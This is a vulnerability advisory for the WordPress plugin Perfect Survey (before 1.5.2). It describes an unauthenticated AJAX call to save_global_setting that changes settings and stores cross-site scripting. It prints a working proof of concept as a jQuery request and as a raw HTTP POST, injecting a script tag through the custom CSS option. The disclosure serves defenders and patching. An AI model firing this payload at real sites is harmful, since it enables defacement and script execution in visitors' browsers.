WordPress Plugin Vulnerabilities
Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update
Description
The plugin does not have proper authorisation nor CSRF checks in the save_global_setting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue which will be executed in the context of a user viewing any survey
Proof of Concept
jQuery.post("https://example.com/wp-admin/admin-ajax.php?action=save_global_setting",{
ps_global_options:{ps_options_custom_css:"body{background-color:blue !important;}</style><script>alert(/XSS/)</script><style>"}
})
POST /wp-admin/admin-ajax.php?action=save_global_setting HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Connection: close
ps_global_options%5Bps_options_custom_css%5D=body%7Bbackground-color%3Ablue+!important%3B%7D%3C%2Fstyle%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E%3Cstyle%3E
This will cause all posts with a survey to be rendered blue, along with the XSS alert. Affects Plugins
Fixed in version 1.5.2 - plugin closed
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-10-05 (about 1 years ago)
Added
2021-12-29 (about 1 years ago)
Last Updated
2022-04-13 (about 9 months ago)